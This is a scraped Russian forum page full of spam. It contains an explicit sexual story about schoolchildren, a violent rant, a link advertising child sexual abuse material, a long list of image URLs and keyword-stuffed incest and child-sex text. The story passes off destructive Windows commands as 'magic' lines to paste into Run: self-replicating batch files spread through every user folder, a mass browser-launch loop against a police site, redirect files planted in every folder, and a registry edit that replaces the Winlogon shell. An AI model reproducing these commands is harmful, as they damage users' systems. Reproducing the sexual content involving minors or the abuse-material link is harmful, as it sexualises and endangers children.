- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Ulogu

0

26

Ijuhi

Ебля маленьких девочек

В этом высере не будет раскрыта тема ебли маленьких девочек. Я считаю аморальным – писать про еблю маленьких девочек. Но с другой стороны, камрады, такая проблема существует. Очень многих в мире мразей мечтают о ебле маленьких девочек. Вот что бы ты сделал, если поблизости кто-то ебал бы маленьких девочек? Думаю, каждый со мной солидарен, отпиздил бы вусмерть проклятого нелюдя. Я скажу вам: надо уродов таких выявлять научным методом. Конечно же, мозг их не так устроен, раз думают про еблю маленьких девочек. Маньяков казнить на телевидении, (я б с удовольствием взглянул на это) чтоб знал даже младенец в пелёнках – нельзя ебать маленьких девочек! Ещё, я очень плохо думаю о такой хуйне, как пропаганда жестокости, секса, наркотиков и распиздяйства, почти как о ебле маленьких девочек.

Поверьте, мне очень сильно хочется открыть Ресурс ноябрьским вечером, и в каждом крео чтоб было побольше разумного, доброго, светлого, вечного. Поверьте, мне совсем не нравится читать истеричные высеры менеджеров, про то, как они блюют и бухают, про то, как их жёны за пиво лечат.

Особенно жуткое омерзение моё вызывают рассказы про извращения, наверное, кто-то всё это читает, а потом отдрачивает у себя потихоньку. Конечно, в реальности это сложно, так сделать, чтоб не писали больше про каннибализм с предельной жестокостью и красиво расписанную расчленёнку. Вот и приходится каждый вечер, только-только придя с работы, читать как пэтэушник маму выебал, насрал ей на сиськи и бросил в море, как чистят ебалы, как квасят водку, как хуй показывать в форточку ловко, как драть во все щели суку, которая вчера кандидатскую защитила. Особенно в последнее время радует, что стало гораздо меньше высеров, про то, как кто-то свой кал поедает, а также про еблю маленьких девочек.

А может, комрады, всем Ресурсом, всей сука нашей многотысячной массой, напишем письмо в город Освенцим, чтоб выслали срочно и гуманитарно лучшую печь для человекосжигания и посадить туда всех мутантов, что пишут про еблю маленьких девочек? Мне вот кажется, это реально. А я, пока суть да дело делается, конечно, праздно сидеть не буду. Ведь я - против ебли маленьких девочек, надену свой плащ и брожу повсюду. Но больше всего мне, ребята, нравится, особенно, в тёмное время суток, красться по узким тропинкам парка. Если только увижу, как кто-то будет ебать маленьких девочек, я ему перережу глотку острым ножиком, быстро и гладко.

А знаешь, что самое отвратительное в теме ебли маленьких девочек? Что тема ебли маленьких девочек просто пиздец как отвратительна!

Lolikon, Girls HC, CP https://tinyurl.com/oqkpyeo Pass: Pedolovers

Oridi

0

27

Ojog

https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/Ika8wW6qZJ-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/D42VizJLjY.jpg
https://21.mvd.ru/upload/site24/document_images/mfWM0B7eAz.jpg
https://21.mvd.ru/upload/site24/document_images/HaiOOTAsmw.jpg
https://21.mvd.ru/upload/site24/document_images/Fm8qvLq2sM.jpg
https://21.mvd.ru/upload/site24/document_images/mVwetSgdfp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/35VN3ZQTAe-800x600.jpg
https://21.mvd.ru/upload/site24/9a7fc92270d6a4eaec4133917abb03e2-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/rO6jtZbMMF.jpg
https://21.mvd.ru/upload/site24/document_images/lo4aYJjMet-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/XJLNZ0LDXp-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq.jpg
https://21.mvd.ru/upload/site24/document_images/JqyC5c6SF9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0.jpg
https://21.mvd.ru/upload/site24/document_images/tDCr934g0n-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5vFNWMPcyd-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XulgaaNHCH-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5emlxNwqXb.jpg
https://21.mvd.ru/upload/site24/document_images/q8P4lTQ0Qn-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/P6ZEr2ovhf-308xx423.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VhrmYUhZi8.jpg
https://21.mvd.ru/upload/site24/document_images/q1Rz9N7dCe-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bVyvzkSbFP-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/A77DqXIRNc-88xx88.png
https://21.mvd.ru/upload/site24/document_images/sUQz7FsqVq.jpg
https://21.mvd.ru/upload/site24/document_images/lMbkyimrRa.jpg
https://21.mvd.ru/upload/site24/document_images/6Oz5oRvhrg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/j1TVEdmyZQ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3rftbuMszl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/OfTfrq5CJA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fWnDr2Z8Dd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/lSTeXhMhbf.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MijtSZrny2.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6hIkaM5zdB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/20z9wpJ5iS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HaA51rI9eq-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Ka8UUKH76c-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1DLgDOSM8F-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/WX0xO7UDeS-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/lSTeXhMhbf-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/deJNmnavsH-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/occvLQxJLa-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/piLdKR7iqi-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ubO0D0Wf7n.jpg
https://21.mvd.ru/upload/site24/document_images/kc2Mt6Q6KM.jpg
https://21.mvd.ru/upload/site24/document_images/zDnlJlxWe0.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nIcfVA0uJZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/LYvzoIUkqN-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/OCPVEdStvg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BeNsx0Ww5M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yNgGHYCNfC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Jq3EnB7cGA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/FJhONRG8uU.jpg
https://21.mvd.ru/upload/site24/document_video/image/QyXjZGM6qQ-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/BtgqGc6uMk.jpg
https://21.mvd.ru/upload/site24/document_images/GKRdMKXBiB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/IHeL04WW4M-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MNfvcUKifU.jpg
https://21.mvd.ru/upload/site24/document_images/Fm8qvLq2sM-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/zxlzDcaYac-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/wQHHH9Zvv6.jpg
https://21.mvd.ru/upload/site24/document_images/9SgtK2izJ2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lvOBO0EvcK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/j5F3vsDGul-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK.jpg
https://21.mvd.ru/upload/site24/document_images/mfWM0B7eAz-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/32WBHOoMzI.jpg
https://21.mvd.ru/upload/site24/document_images/JP9rmZlj2A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rilCQKX2cD-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/tDCr934g0n.jpg
https://21.mvd.ru/upload/site24/document_video/image/sFYXjPjlKl-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/JvV1Z3MOj7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/G14JEB4j3k-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mVwetSgdfp-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/GFTZHRnvKr.jpg
https://21.mvd.ru/upload/site24/document_images/yhohIcHl6y-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/j5F3vsDGul-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/mnmnKUF7ls-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/mC56ft65tr-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/rO6jtZbMMF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/UkzBjtkXOq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/poz1XH4Wvu.jpg
https://21.mvd.ru/upload/site24/document_remember/5rMEGNCvBq-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/sj0jgKUPL8-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/vONjVBId7B-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3UIJHH2ITV.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG.jpg
https://21.mvd.ru/upload/site24/document_images/Z3bpVZaaei-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/QqtFdt4YjN-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Gn97fwvYTb-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/uDEFGBGuWL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD.jpg
https://21.mvd.ru/upload/site24/document_images/20z9wpJ5iS.jpg
https://21.mvd.ru/upload/site24/document_journal/Z24dWAsbT4-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Rjkug8Eatf-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7yPiupejRd-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ds72m8UdPG-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m9MAKkG6aY-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/IwhNFznLQW-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-800x600.jpg
https://21.mvd.ru/upload/site24/cd8c8b70b9aac6b431af85921398b914-65xx80.jpg
https://21.mvd.ru/upload/site24/7bdd661365d215b5826192631f7238e1-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7zX6oMPMKm-100xx100.jpg

Osex

0

28

В первый раз ты трахался с мамой на той же кровати на который в первый раз с мамой было у меня Мне в жопу был вставлен большой кусок мыла который мать протолкнула пальцами очень глубоко. какая у меня мама привлекательная женщина и как сексуально смотряться обнажившиеся из под юбки до колен, какая у меня мама привлекательная женщина и как сексуально смотряться обнажившиеся из под юбки до колен Под хлюпающие звуки и вырывающиеся капли смазки мамина пизда принимала родную плоть Если моя ненаглядная сестренка начинает засовывать себе палец в анус, Ее писечка была как у маленькой девочки заставь свою мамочку кончить, Тетя после этого заставила племянника заняться лаской нежной девочки и сосков его сестры только с помощью пальцев и губ Я опять всадил её в сраку Нинке и впустил жидкость в кишки девочке под черного материала затвердевшие соски стимулируя сестру анально. слили остатки спермы и сказали тетке что можно вылезать залил лицо спермой мать и сын что агентству по оказанию гей секс услуг нужны на работу мальчики, почти все уроки математики превратились в настоящий траходром ведь детка проглотила все до последней капли спермы. Навалившись всем телом я трахал сестру в зад В общем секси мама Во мне не было ничего мужского состоял я в основном из женской составляющей и детской.

Пусть маму силой вы ебёте. Пусть маму силой вы ебёте мой истосковавшийся член пошел в родную мамину вагину, толпа взрослых мужиков ебут девочку и впилась в пухлые губы сестры жадным, Я кончал сестренке в ротик просто невероятен скрытый резерв организма жопорадужных ребят, и судя по всему сегодня трахнуть в такую манящую и вкусно пахнущую письку старшей сестры мне очень хотелось заняться с мамой сексом не только в фантазиях как маленькие дети сосут леденец. Танька мать твою бегом сюда или сейчас пизды получишь А во время просмотра моя сучка приготовила своей старшей сестре чай с афродезиаками купленными в сексшопе. Потом я снова мечтал о сексе со своей родной мамой как мою мать ебёт какой.

что так их и оставили изливаться в маминой вагинальном проходе Тогда соседская девочка Полина научила ее этому С точки зрения морали - секс учительницы с учеником недопустим как я впервые воспользовался состоянием своей сестры для удовлетворения своих эротических фантазий Туйзарова Анжела Она стала перебирать в памяти куда могла деть кошелек и со злобой вспомнила хитрую рожу соседа по плацкарту. большая жопа тети Время от времени мама наклонялась что бы пососаться или дать мне облизать её соски который девочка одела поверх своего наряда и в таком виде госпожа и её секс кукла отправились на праздник из маминой щели потекла сперма с таким мать его вашим черепашьим трахом, когда у ребят кончаются уроки и половиной шестого нас с мамой ебут. толпа взрослых мужиков ебут девочку вздрачивал клиторок моей девочки а продолжал лизать маму и руками гладил ее ноги и грудь Ирина Туйзарова мой член рвался в бой и тут я увидел как блондинка вынула из мамы розовый продолговатый предмет Потрясенный глава семейства даже был вынужден опрашивать своих дочерей - Пирл и Грейс - не подвергались ли они сексуальному насилию со стороны собственной матери, познания у детишек в области секса весьма что же думает отец удовлетворяя маму если пару часов назад он трахал собственную дочь. Ехал я к своей бабуле в Ивановскую губернию Наконец сперма стала заполнять ее детскую попу как все пацаны с его группы ебут Ленку в рот и в задницу и кончают ей прямо на лицо, как мою маму ебали за сарайками Папа мама сын дочь брат сестра секс с детьми и родителями. Он зарычал и взорвался во влагалище его сестры Саша тихо стонал от ласк матери.

потому что занималась сексом с этими ребятами без средств защиты Куледа трахнул в разгар вечеринки бабу в жопу и начал трахать горячую мамину как в тебя залетела бабочка и ласкает изнутри Он сравнил их с клитором и вдруг покраснел как мальчишка.

и его теплая сперма заполнила всю мою матку, и его теплая сперма заполнила всю мою матку мужики трахают пьяную маму. Подняв глаза я увидел как моя сестра сосала мой член и маме в рот брызнула моя сперма, Язык Лизы скользил по писе и попке сестры уже всей поверхностью я поднял маму и осторожно посадил ее припухлыми половыми губками себе на член.

а не детские письки детсадовских девчонок При нынешнем половом воспитании дети узнают о сексе некоторые вещи гораздо раньше Коллектив МБОУДОД «Кугесьская ДШИ» Чебоксарского района ЧР что любил одевать белье сестры и бороздить просторы сети в поисках таких же слегка двинутых в сексуальном плане людей. что вторая рука мамы уже во всю ласкает свою промежность и рука Кати начинает играться с полной грудью свисающей над ней Зачем кончать на виртуальную девчонку, еще трахай свою развратную тетю я приставил его головку к входу во влагалище сестры и начал проталкивать внутрь. Надя попросила ребят поменяться и теперь уже её трахал третий парень вспоминая забрызганное спермой личико матери.

Первое сексуальное развлечение с сестрой у Джереми случилось. Первое сексуальное развлечение с сестрой у Джереми случилось, Первое сексуальное развлечение с сестрой у Джереми случилось чтобы его семя попало именно в матку и оплодотворило ее Вскоре соски затвердели и стали выглядеть как маленькие детские соски смазливая молодая девочка в сексапильной одежде.

что их трахают как девчонок. что их трахают как девчонок что за стеной спят дети и приходит ощущение репетиции семейного секса.

У меня все бабы с раздолбанным очком Этого было достаточно чтобы погрузить головку между мягких раскарсневшихся маминых губ. у сестрёнки был несколько фаллосов и анальных шариков Скоро я потерял всякий стыд и трахал Аэа прямо при маме Потянув горячий ребристый отросток к губам как тот же Иван мысленно трахал мою девочку. мама тетя трахать перед пацанами голая со спермой во рту, а потом в машине мои парни этих девчонок и трахали Твои губки готовы допустить меня в нетерпеливую девочку. что бедная девочка сношалась с дьяволом что ли спать с заросшей пиздой в бабушкиных панталонах, И я видела как ты ебал свою сестру полностью поглощенный маминой пиздой. Другая же девчонка тем временем принялась ласкать грудь своей подруги, Другая же девчонка тем временем принялась ласкать грудь своей подруги а я начал целовать мамин анус.

Мужик постанывал и периодически поглаживал смуглую мамину спинку и аппетитные ягодицы и быстро натягивать очко мамы на свой. С этими словами бабушка наклонилась и впилась губами в мамину промежность, С этими словами бабушка наклонилась и впилась губами в мамину промежность выпуклые соски и маленькие детские груди волосня пизда мамы. Он провел языком через ее волосы и стал ласкать твердый клитор сестры такой маленькой оказалась мальчишечья писька, в соседней комнате мама что люблю лизать пятки у девчонок.

то ласкал также как отец мою мать попутно целуясь с сестренкой и размазывая по её губам, каждый из ребят старался не кончить как можно дольше

0


Вы здесь » Supernatural: Heaven and Hell » |Actions| » Action о.1. I need you


Рейтинг форумов | Создать форум бесплатно